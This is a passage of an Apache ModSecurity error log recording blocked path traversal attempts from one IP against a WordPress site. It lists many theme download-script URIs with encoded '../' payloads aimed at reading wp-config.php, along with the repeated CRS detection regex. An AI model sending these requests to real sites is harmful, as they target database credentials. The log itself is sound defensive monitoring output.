"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/loom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/loom/download.php"] [unique_id "ZEeeqz754oNYNW-15_AYhQAAAAo"] [Tue Apr 25 04:34:35.930565 2023] [:error] [pid 15889:tid 140446974015232] [client 37.120.213.169:41858] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mercato/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mercato/framework/utilities/download/getfile.php"] [unique_id "ZEeeq14G6tVEc6w5Us7gxQAAANY"] [Tue Apr 25 04:34:36.057142 2023] [:error] [pid 15578:tid 140447015978752] [client 37.120.213.169:41860] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "ZEeerD754oNYNW-15_AYhgAAABE"] [Tue Apr 25 04:34:36.184107 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:41862] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ParentingOurParents/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ParentingOurParents/download/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WRgAAAIM"] [Tue Apr 25 04:34:36.320332 2023] [:error] [pid 15580:tid 140446965622528] [client 37.120.213.169:41864] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salient/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WRwAAAJc"] [Tue Apr 25 04:34:36.446687 2023] [:error] [pid 15580:tid 140447194773248] [client 37.120.213.169:41866] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyseventeen/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseventeen/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WSAAAAIQ"] [Tue Apr 25 04:34:36.573183 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:41868] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/verse/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/verse/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WSQAAAI4"] [Tue Apr 25 04:34:36.698695 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41870] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wp-clean-slate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wp-clean-slate/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WSgAAAII"] [Tue Apr 25 04:34:36.825067 2023] [:error] [pid 15580:tid 140447219951360] [client 37.120.213.169:41872] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippe-riehling/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippe-riehling/functions/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WSwAAAIE"] [Tue Apr 25 04:34:36.950374 2023] [:error] [pid 15580:tid 140447091513088] [client 37.120.213.169:41874] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/directory-starter/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/directory-starter/download.php"] [unique_id "ZEeerN-GjcOLRjW9Sa4WTAAAAIg"] [Tue Apr 25 04:34:37.076280 2023] [:error] [pid 15579:tid 140446957229824] [client 37.120.213.169:41876] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/firestarter/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/firestarter/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpegggAAAFg"] [Tue Apr 25 04:34:37.214959 2023] [:error] [pid 15579:tid 140447074727680] [client 37.120.213.169:41878] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/presstissimo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/presstissimo/download.php"] [unique_id "ZEeerSIlOCjnXl5KlpeggwAAAEo"] [Tue Apr 25 04:34:37.340706 2023] [:error] [pid 15579:tid 140447099905792] [client 37.120.213.169:41880] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acamir-theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acamir-theme/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpeghAAAAEc"] [Tue Apr 25 04:34:37.467727 2023] [:error] [pid 15579:tid 140447108298496] [client 37.120.213.169:41882] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/agency/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/agency/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpeghQAAAEY"] [Tue Apr 25 04:34:37.601005 2023] [:error] [pid 15579:tid 140447203165952] [client 37.120.213.169:41884] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/comune-di-fornelli/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/comune-di-fornelli/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpeghgAAAEM"] [Tue Apr 25 04:34:37.726276 2023] [:error] [pid 15579:tid 140447211558656] [client 37.120.213.169:41886] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/delia/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/delia/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpeghwAAAEI"] [Tue Apr 25 04:34:37.861639 2023] [:error] [pid 15579:tid 140447186380544] [client 37.120.213.169:41888] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/g5_helium/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/g5_helium/down.php"] [unique_id "ZEeerSIlOCjnXl5KlpegiAAAAEU"] [Tue Apr 25 04:34:37.987197 2023] [:error] [pid 15889:tid 140447186380544] [client 37.120.213.169:41890] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hueman/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hueman/down.php"] [unique_id "ZEeerV4G6tVEc6w5Us7gxgAAAMU"] [Tue Apr 25 04:34:38.113688 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:41892] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kayano/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kayano/down.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gxwAAAMY"] [Tue Apr 25 04:34:38.245364 2023] [:error] [pid 15889:tid 140447194773248] [client 37.120.213.169:41894] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/pinboard/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pinboard/down.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gyAAAAMQ"] [Tue Apr 25 04:34:38.390260 2023] [:error] [pid 15889:tid 140446999193344] [client 37.120.213.169:41896] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/startheme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/startheme/down.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gyQAAANM"] [Tue Apr 25 04:34:38.515598 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41898] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tplbs/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tplbs/down.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gygAAAMs"] [Tue Apr 25 04:34:38.641114 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:41900] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gywAAANA"] [Tue Apr 25 04:34:38.766621 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:41902] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match 